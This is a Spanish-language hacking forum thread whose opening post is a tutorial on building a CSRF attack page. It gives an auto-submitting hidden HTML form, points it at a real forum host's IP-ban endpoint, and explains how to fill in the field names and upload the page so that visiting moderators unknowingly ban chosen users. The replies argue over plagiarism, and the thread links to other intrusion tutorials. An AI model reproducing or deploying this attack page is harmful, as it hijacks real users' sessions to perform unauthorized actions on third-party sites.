comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[TUTORIAL] Como crear tu csrf

  • 4 Respuestas
  • 2547 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Windero

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 23, 2013, 07:44:15 pm »
Introducción:

Un ataque CSRF fuerza al navegador web validado de una víctima a enviar una petición a una aplicación web vulnerable, la cual entonces realiza la acción elegida a través de la víctima. Al contrario que en los ataques XSS, los cuales explotan la confianza que un usuario tiene en un sitio en particular, el cross site request forgery (CSRF) explota la confianza que un sitio tiene en un usuario en particular.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Explicando:

Lo primero es encontrar una web vulnerable a csrf, yo usare mi@ ya que esta plagada de ellos exactamente este formulario:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Ese es el formulario que usare en el post, el csrf del ejemplo aplica el baneo de ip es decir puedes banear a cualquier usuario por ip un máximo de 30 días de cualquier foro mi@, recomiendo crear tu foro y probarlo desde ahí.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Lo primero para ayudar a entender el código mejor, y su posterior publicación recomiendo crearlo en No tienes permisos para ver links. Registrate o Entra con tu cuenta

Una vez abierto pastebin copiamos esta estructura del csrf:

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="modificar" method=post name="csrf1">
  8. <input type="hidden" name="modificar" value="modificar">
  9. <input type="hidden" name="modificar" value="modificar">
  10. <input type="hidden" name="modificar" value="modificar">
  11. <input type="hidden" name="modificar" value="modificar">
  12. <body onload="envio_csrf()">


La web vulnerable ahí que ponerla en esta linea:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<form action="http://foros.miarroba.es/baneo_ip.php?id=2099129&do=new" method=post name="csrf1">
Ahora entramos al formulario en mi caso el de baneo, y en los ''textos'' donde escribes los datos inspeccionamos el elemento, y buscamos name="modificar" value="modificar" en el apartado modificar en cada web saldrá una palabra distinta, en mi caso es ip y motivo en los 2 textbox.





Ahora en la linea del csrf la modificamos y quedaría así:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<input type="hidden" name="ip" value="Aquí iría la ip que quisiéramos banear">
Y así sucesivamente con todos los textbox, en name el que te de el código fuente y en value lo que tu quieras que se ponga en el textbox


Y para finalizar el mas importante el de botón de continuar ya que sin eso, no se podría hacer que funcione, es lo mismo:

Inspeccionamos elemento del botón, y nos dará (en mi@):



Con esos datos la parte del csrf quedaría (que seria la ultima linea):

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<input type="hidden" name="boton_continuar" value="continuar">
Con eso terminaríamos el csrf, y solo quedaría guardarlo en php y subirlo en algún hosting.
« Última modificación: Agosto 23, 2013, 07:49:10 pm por ndk »
-Un trabajo mierdero de una persona es el trabajo a tiempo completo de otra persona. (Jessica Gaston)

Desconectado M5f3r0

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
  • Leer la firma.
    • Ver Perfil
  • Skype: m5f3r0
« Respuesta #1 en: Agosto 23, 2013, 10:45:20 pm »
Estás rippeando los posts de el foro No tienes permisos para ver links. Registrate o Entra con tu cuenta, coloca la fuente por favor.

Saludos ;).
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #2 en: Agosto 23, 2013, 10:45:55 pm »
Autor del Post: IrareHS
Fuente: Holoscripter.org

Deja ya de copiar temas del foro, estas llenandolo haciendo copy & paste, y sin poner creditós, que falta de verguenza.
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« Respuesta #3 en: Agosto 24, 2013, 06:14:27 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Autor del Post: IrareHS
Fuente: Holoscripter.org

Deja ya de copiar temas del foro, estas llenandolo haciendo copy & paste, y sin poner creditós, que falta de verguenza.

Tienes mucha razón yo ya le advertí en otro tema, y sigue igual.

Un saludo.

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter
« Respuesta #4 en: Agosto 24, 2013, 08:09:05 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Autor del Post: IrareHS
Fuente: Holoscripter.org

Deja ya de copiar temas del foro, estas llenandolo haciendo copy & paste, y sin poner creditós, que falta de verguenza.

Morenito te equivocas el post es mio, no de rare jaja ;)

Si algun mod o adm puede poner el autor original lo agradecería

 

¿Te gustó el post? COMPARTILO!



Los 3 modos más comunes de hackear WordPress y cómo evitarlo

Iniciado por Hackmundy

Respuestas: 2
Vistas: 6048
Último mensaje Marzo 06, 2013, 01:15:42 am
por b166er
Como Encontrar el AdminPanel (Algunos Metodos)

Iniciado por hdbreaker

Respuestas: 4
Vistas: 3112
Último mensaje Junio 25, 2012, 03:34:37 pm
por Satyricon
Cómo explotar vulnerabilidad de Windows 7 con Metasploit

Iniciado por Pekador

Respuestas: 2
Vistas: 4389
Último mensaje Abril 16, 2012, 04:35:47 pm
por SPELINAX
[VIDEO] Como subir una shell a Wordpress

Iniciado por unkdown

Respuestas: 2
Vistas: 2297
Último mensaje Diciembre 13, 2015, 07:12:12 pm
por Gabriela
¿Que es un Buffer Overflow?¿Como explotarlo?

Iniciado por HckDrk

Respuestas: 3
Vistas: 2588
Último mensaje Noviembre 24, 2012, 07:21:39 am
por Pr0ph3t